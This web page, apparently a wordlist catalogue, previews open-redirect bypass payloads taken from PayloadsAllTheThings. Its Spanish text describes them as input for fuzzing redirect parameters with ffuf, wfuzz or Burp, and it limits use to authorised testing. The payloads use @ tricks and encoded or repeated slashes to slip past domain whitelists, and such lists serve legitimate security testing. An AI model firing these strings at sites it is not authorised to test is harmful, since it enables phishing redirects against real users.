Open Redirect Payloads (PayloadsAllTheThings)

//google.com/%2f.. //www.whitelisteddomain.tld@google.com/%2f.. ///google.com/%2f.. ///www.whitelisteddomain.tld@google.com/%2f.. ////google.com/%2f.. ////www.whitelisteddomain.tld@google.com/%2f.. https://google.com/%2f.. https://www.whitelisteddomain.tld@google.com/%2f.. /https://google.com/%2f.. /https://www.whitelisteddomain.tld@google.com/%2f.. //www.google.com/%2f%2e%2e //www.whitelisteddomain.tld@www.google.com/%2f%2e%2e ///www.google.com/%2f%2e%2e ///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e ////www.google.com/%2f%2e%2e

Payloads de bypass de redirección abierta que usan trucos de evasión de listas blancas (trucos con @, barras codificadas, dobles barras) contra un dominio de marcador de posición whitelisteddomain.tld. Diseñados para hacer fuzzing de parámetros de redirección/return-url.

Esta lista está orientada al fuzzing de entradas y al descubrimiento de vulnerabilidades. Contiene aproximadamente 8.5 KB y se combina bien con herramientas como ffuf, wfuzz, burp. Elige la lista más pequeña que se ajuste a tu trabajo: las listas más cortas son más rápidas y discretas para ataques en línea, mientras que las más grandes ofrecen una cobertura más amplia para el trabajo sin conexión, donde la velocidad es una limitación menor.

Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a tu portapapeles o descargar el archivo .txt sin procesar. La lista completa se sirve directamente desde su fuente original en GitHub.

Obtenida de swisskyrepo/PayloadsAllTheThings y distribuida bajo MIT. Utiliza las wordlists únicamente contra sistemas que estés explícitamente autorizado a probar.

Vista previa